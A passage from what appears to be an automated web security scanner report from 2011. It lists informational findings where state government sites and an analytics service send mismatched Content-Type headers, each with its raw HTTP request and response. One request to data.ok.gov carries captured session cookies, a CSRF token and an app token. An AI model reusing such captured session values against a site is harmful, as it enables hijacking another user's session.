Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.144. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.41453591943718493/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.41453591943718493/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.41453591943718493/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:22:47 GMT
Expires: Tue, 05 Apr 2011 11:22:47
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.145. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4250001448672265/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.4250001448672265/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.4250001448672265/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:17:29 GMT
Expires: Tue, 05 Apr 2011 11:17:29
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.146. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.4458236221689731/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.4458236221689731/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.4458236221689731/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:22:30 GMT
Expires: Tue, 05 Apr 2011 11:22:30
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.147. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.49288138072006404/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.49288138072006404/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.49288138072006404/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:16:06 GMT
Expires: Tue, 05 Apr 2011 11:16:06
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.148. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5206995762418956/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.5206995762418956/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.5206995762418956/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:16:56 GMT
Expires: Tue, 05 Apr 2011 11:16:56
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.149. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5421753553673625/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.5421753553673625/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.5421753553673625/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:14:59 GMT
Expires: Tue, 05 Apr 2011 11:14:59
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.150. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.5555199990049005/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.5555199990049005/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.5555199990049005/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:19:10 GMT
Expires: Tue, 05 Apr 2011 11:19:10
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.151. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6276831564027816/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.6276831564027816/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.6276831564027816/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:18:03 GMT
Expires: Tue, 05 Apr 2011 11:18:03
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.152. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.6466669554356486/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.6466669554356486/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.6466669554356486/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:20:50 GMT
Expires: Tue, 05 Apr 2011 11:20:50
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.153. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7472825900185853/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.7472825900185853/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.7472825900185853/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:15:33 GMT
Expires: Tue, 05 Apr 2011 11:15:33
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.154. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7475871213246137/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.7475871213246137/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.7475871213246137/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:20:17 GMT
Expires: Tue, 05 Apr 2011 11:20:17
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.155. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.7839805490802974/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.7839805490802974/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.7839805490802974/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:15:15 GMT
Expires: Tue, 05 Apr 2011 11:15:15
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.156. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.811701592290774/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.811701592290774/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.811701592290774/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:16:40 GMT
Expires: Tue, 05 Apr 2011 11:16:40
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.157. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8338523292914033/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.8338523292914033/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.8338523292914033/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:18:20 GMT
Expires: Tue, 05 Apr 2011 11:18:20
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.158. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8455094299279153/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.8455094299279153/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.8455094299279153/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:18:36 GMT
Expires: Tue, 05 Apr 2011 11:18:36
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.159. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8464667112566531/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.8464667112566531/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.8464667112566531/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:21:23 GMT
Expires: Tue, 05 Apr 2011 11:21:23
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.160. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.870363011257723/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.870363011257723/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.870363011257723/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:17:46 GMT
Expires: Tue, 05 Apr 2011 11:17:46
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.161. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.8804292443674058/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.8804292443674058/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.8804292443674058/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:17:13 GMT
Expires: Tue, 05 Apr 2011 11:17:13
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.162. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.884554136544466/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.884554136544466/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.884554136544466/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:21:57 GMT
Expires: Tue, 05 Apr 2011 11:21:57
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.163. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1664119246/0.9358769238460809/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1664119246/0.9358769238460809/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1664119246/0.9358769238460809/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:18:54 GMT
Expires: Tue, 05 Apr 2011 11:18:54
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.164. http://data.ok.gov/views.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.ok.gov
Path:   /views.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /views.json?accessType=WEBSITE&_=1304162592421&method=getCountForTableId&tableId=220869 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:51 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 2

1

30.165. http://data.osbm.state.nc.us/pls/linc/dyn_linc_main.show  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.osbm.state.nc.us
Path:   /pls/linc/dyn_linc_main.show

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pls/linc/dyn_linc_main.show HTTP/1.1
Host: data.osbm.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:49 GMT
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server
X-DB-Content-length: 684
Connection: close
Content-Type: text/html; charset=WINDOWS-1252
Content-Length: 684

<frameset rows="12%,1%,58%,29%" frameborder="0" border="0">
<frame src="linc.dyn_linc_main.header" name="header"scrolling=no frameborder="0" border="0">
<frame src="linc.dyn_linc_main.bar" name="bar"
...[SNIP]...

30.166. http://de.gov/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://de.gov
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: de.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fcspersistslider1=5

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:51:46 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 29 Mar 2011 19:49:07 GMT
ETag: "13801c4-37e-49fa45a6712c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

30.167. http://doa.alaska.gov/dmv/scripts/style.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://doa.alaska.gov
Path:   /dmv/scripts/style.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /dmv/scripts/style.css HTTP/1.1
Host: doa.alaska.gov
Proxy-Connection: keep-alive
Referer: http://doa.alaska.gov/dmv/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Tue, 28 Oct 2008 08:59:58 GMT
Accept-Ranges: bytes
ETag: "0fb838ddb38c91:1aaa"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-FRAME-OPTIONS: SAMEORIGIN
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 22:13:31 GMT
Content-Length: 4108

<style>
   
   
   /* netscape inheritance-handicap stylesheet, redundant, but effective */
   /* designed for ease of re-deployment */
   
   td,p,li { color: #333333; font: normal 10pt Arial, Tahoma, Verd
...[SNIP]...

30.168. https://dotax.ehawaii.gov/efile/css/stylesheet.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://dotax.ehawaii.gov
Path:   /efile/css/stylesheet.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /efile/css/stylesheet.css HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Referer: https://dotax.ehawaii.gov/efile/user
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
